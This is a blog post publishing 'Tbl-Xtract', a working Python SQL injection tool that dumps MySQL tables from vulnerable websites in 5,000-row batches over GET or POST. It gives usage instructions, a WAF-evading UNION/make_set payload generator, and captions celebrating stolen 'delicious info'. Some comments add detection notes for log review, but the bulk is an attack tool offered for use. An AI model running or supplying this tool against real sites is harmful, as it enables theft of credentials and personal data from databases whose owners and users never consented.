Sunday, 28 August 2016

MYSQL Db dump tool tbl-xtract

Tbl-Xtract is a script to dump huge databases quickly. It can dump 5 thousand records in one request (quite fast, huh?). It also supports POST SQLi and a custom limit; the default is 5 thousand. There's also the handy -A option for an apostrophe if required.
  • Usage
Using the script requires a bit of work: you have to know the total number of columns, the vulnerable column, the table name and the columns to dump. With all that information at hand, you just run the script using
python –c Total_columns –v Vulnerable_column –t Table_Name –n column_names 
  • Screenshots
tbl_xtract_python_virkid
Help text
tbl_xtract_python_virkid_1
in Action
tbl_xtract_python_virkid_2
Aha! The Dump File
tbl_xtract_python_virkid_3
Delicious info!
  • Code
#Table Extractor Script
#Idea : Ch3rn0by1
#C0de : VIRkid fb.com/virkid36
# Greets to team Madleets
#Beta version
#Disclaimer : Author is not responsible for any illegal usage of the script
###################################
 
import urllib2,re,sys,urllib,argparse
# Command-line interface. Only the positional Target is mandatory for argparse;
# every option except -p defaults to None, so an omitted -c/-v/-t/-n is only
# noticed later, when the main block's TypeError handler fires.
parser = argparse.ArgumentParser(
    description="Data Dumping utility ./VIRkid",
)
parser.add_argument(
    "Target",
    type=str,
    help="VULNERABLE url",
)
parser.add_argument(
    '-c', '--columns',
    type=int,
    help="Total Number of Columns",
)
parser.add_argument(
    '-v', '--vuln',
    type=int,
    help="Vulnerable Column",
)
parser.add_argument(
    '-t', '--table',
    type=str,
    help="Table name to extract e.g tbl_admin",
)
parser.add_argument(
    '-n', '--column_name',
    type=str,
    help="comma separated list of columns to extract e.g username,password,email",
)
parser.add_argument(
    '-A', '--Apostrophe',
    type=str,
    help="set to y to add Apostrophe at the start of query ",
)
# -p doubles as the mode switch: the literal default 'GET' selects the GET
# path, any other value is treated as the POST body template.
parser.add_argument(
    '-p', '--POST',
    type=str,
    default='GET',
    help="POST SQLi",
)
# NOTE(review): the help text speaks of multiples of 5, but the main loop
# advances its counter in steps of 5000 and compares that counter to this value.
parser.add_argument(
    '-L', '--limit',
    type=int,
    help="Limit Multiples of 5 (5X)",
)
args = parser.parse_args()
 
#Banner
def banner():
    """Print the tool's fixed seven-line ASCII banner to stdout."""
    rows = (
        "\t\t*********************************************",
        "\t\t*                                           *",
        "\t\t*              Tbl Xtrcat                   *",
        "\t\t*              .:VIRkid:.                   *",
        "\t\t*       Usage: python script.py -help       *",
        "\t\t*     ali ahmady , pHaNtOm_X ,Ch3rn0by1     *",
        "\t\t*********************************************",
    )
    for row in rows:
        print row
#Column Generator
 
 
 
def colc(num):
    """Return "1,2,...,num" followed by the URL-encoded '#' ("%23").

    The result is the comma-separated list of column positions 1..num with a
    trailing "%23" appended, e.g. colc(3) -> "1,2,3%23".
    """
    positions = []
    for idx in xrange(1, num + 1):
        positions.append(str(idx))
    # "%23" is the percent-encoded '#' character.
    return ','.join(positions) + "%23"
 
#Query Generator
 
def qry(cols_t,vulnerable_column,table_name,limits,columns,apos=0):
 """Build the URL-encoded string that the main loop appends to the target URL.

 The result is a fixed prefix (`un`) followed by the numbered column list
 from colc(cols_t), in which the number of the vulnerable column has been
 replaced by the `dios` expression. Spaces become '+' and apostrophes
 become '%27'. The string is printed to stdout and returned.

 cols_t            -- total column count, passed to colc()
 vulnerable_column -- column number whose position receives `dios`
 table_name        -- interpolated into `dios` unchanged
 limits            -- row offset used in the `limit %d,%d` clause
 columns           -- column list interpolated into `dios` unchanged
 apos              -- when equal to 'y', the prefix starts with an apostrophe

 Detection notes for log and WAF review, all taken from the literals below:
 requests produced by this function contain `/*!12345union*/`,
 `/*!12345select*/`, `make_set(`, the user-variable assignment `@:=`, and
 the hex literals `0x0a` and `0x3c6c693e`. Parameterized queries on the
 server side remove the injection point this string relies on.
 """
  
 # Only the exact string 'y' selects the apostrophe-prefixed form; the
 # default 0 and any other value fall through to the plain prefix.
 if apos=='y':
   
  un="' and 0 /*!12345union*/ /*!12345select*/ "
 else:
  un=" and 0 /*!12345union*/ /*!12345select*/ "
   
 # Numbered column list with trailing "%23", prefixed by a space so that the
 # single-column case below can match ' 1%23'.
 t_columns=colc(cols_t)
 t_columns=' '+t_columns
 vcol=vulnerable_column
  
 # 0x3c6c693e is the hex encoding of "<li>" and 0x0a is a newline; extractor()
 # later searches the HTTP response for that "<li>" marker. The batch size is
 # hard-coded to 5000 rows, starting at offset `limits`.
 dios="make_set(6,@:=0x0a,(/*!12345select*/(1)/*!12345frOm*/(/*!12345select*/ * /*!12345frOm*/ %s limit %d,%d)shit /*!12345where*/@:=make_set(511,@,0x3c6c693e,%s)),@)"%(table_name,limits,5000,columns)
 # The four branches differ only in which delimiters surround the column
 # number being replaced: sole column, first column, last column, or a
 # column in the middle of the list.
 if cols_t==1 and vcol==1:
  retq=t_columns.replace(' 1%23',dios+'%23')
   
   
  
 elif vcol==1:
  retq=t_columns.replace('%d,'%vcol,dios+',')
   
   
 elif vcol==cols_t:
  retq=t_columns.replace(',%d%%23'%vcol,','+dios+'%23')
   
 
   
 else:
  retq=t_columns.replace(',%d,'%vcol,','+dios+',')
  
 furl=un+retq
 # Minimal URL encoding: only spaces and apostrophes are rewritten.
 furl=furl.replace(' ','+').replace("'",'%27')
 # The complete string is echoed to stdout on every call.
 print furl
 return furl
 
 
#Record Extractor
 
def extractor(u,data):
    """Send one request to `u` and return the parsed records as text lines.

    `data` is passed straight to urllib2.Request: None yields a GET, anything
    else is sent as the POST body. The response is searched for the first
    '<li>,' marker; when none is found the process prints "Table exhausted"
    and exits with status 0. Otherwise the first match is split on ',,' into
    records, the remaining commas in each record become '::', and each record
    is returned with a trailing newline.

    Detection note: every request carries the same hard-coded User-Agent
    string set below, which can be correlated with the query-string tokens in
    web-server logs.
    """
    request = urllib2.Request(u, data)
    request.add_header(
        'User-Agent',
        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0',
    )
    body = urllib2.urlopen(request).read()

    matches = re.findall('<li>,.+..?', body)
    if len(matches) == 0:
        # No marker in the response: treated as end of data, not as an error.
        print "\n[+] Table exhausted"
        sys.exit(0)

    # Only the first match is used; markup left over from the page is stripped.
    cleaned = matches[0].replace('<li>', '').strip().replace('</div>', '')
    rows = cleaned.split(',,', 999999)

    print "\n[+] Dumped : %d Records"%len(rows)
    return [row.replace(',', '::') + '\n' for row in rows]
 
# Main driver: opens the dump file, then issues one request per 5000-row
# batch until extractor() ends the process (no '<li>,' marker in the response)
# or the -L limit is reached.
#
# Forensic and detection notes, all taken from the code below:
#  - output goes to 'dump-<host>-<table>-<columns>.txt' in the working
#    directory; only a leading "http://" is stripped when deriving <host>;
#  - consecutive requests differ only in the `limit` offset, which grows by
#    5000 each iteration;
#  - in POST mode the generated string is placed in the body AND is still
#    appended to the URL, so it appears in access logs in both modes.
try:
 t_site=args.Target
  
#limit count
 # c is the running row offset handed to qry() and compared against -L.
 c=0
 banner()
 print "\n[*] Target : %s"%t_site
#Dump File
 dfname='dump-%s-%s-%s.txt'%(args.Target.replace("http://","").split("/",100)[0],args.table,args.column_name)
# dfname="bigdump.txt"
 print "\n[*] Dump File : ",dfname
 # Opened in 'w' mode: an existing file of the same name is truncated.
 dump_file=open(dfname,'w')
  
#GET injection
 # args.POST keeps its default 'GET' unless -p was supplied.
 if args.POST=='GET':
  while True:
    
    
   data_dump=qry(args.columns,args.vuln,args.table,c,args.column_name,args.Apostrophe)
   u=t_site+data_dump
  # print u
   c+=5000
   
   # data=None makes urllib2 issue a GET request.
   dump_file.writelines(extractor(u,None))
   # Without -L (args.limit is None) the loop ends only when extractor()
   # calls sys.exit(0).
   if args.limit:
    if c>=args.limit:
     print "\n[+] Limit Reached"
     break
  dump_file.close()
  
 
#POST Injection
 elif args.POST!='GET':
   
 
  while True:
 
   
  
   data_dump=qry(args.columns,args.vuln,args.table,c,args.column_name,args.Apostrophe)
   # The URL still carries the generated string in POST mode.
   u=t_site+data_dump
   # The -p value is a body template; the literal placeholder "Ij3ct" is
   # replaced by the generated string.
   Pdata=args.POST
   Pdata=Pdata.replace("Ij3ct",data_dump)
 
   print u
   
   dump_file.writelines(extractor(u,Pdata))
   c+=5000
   if args.limit:
    if c>=args.limit:
     print "\n[+] Limit Reached"
     break
 
 # Runs after either branch; in the GET branch the file was already closed.
 dump_file.close()
 
# Raised when required values are missing (they arrive as None from argparse)
# and are used in %-formatting or arithmetic.
except TypeError:
 print "\n[-] Invalid Values OR no values provided for REQUIRED arguments"
 
except urllib2.HTTPError, e:
 print "\n[-] %s | Resource %s"%(e.code,e.msg)
 
except urllib2.URLError:
 print "\n[-] Unable to Connect to Target"
 
# NOTE(review): dump_file is only bound once open() has succeeded; an
# interrupt before that point would reach this handler with the name unset.
except KeyboardInterrupt:
 dump_file.close()
  
except IOError:
 print "[-] Unable to Create dump file"


3 comments:

  1. Well it is delicious. Though since we wet, i haven't got your update nor you made any updates in the code. :PPPP
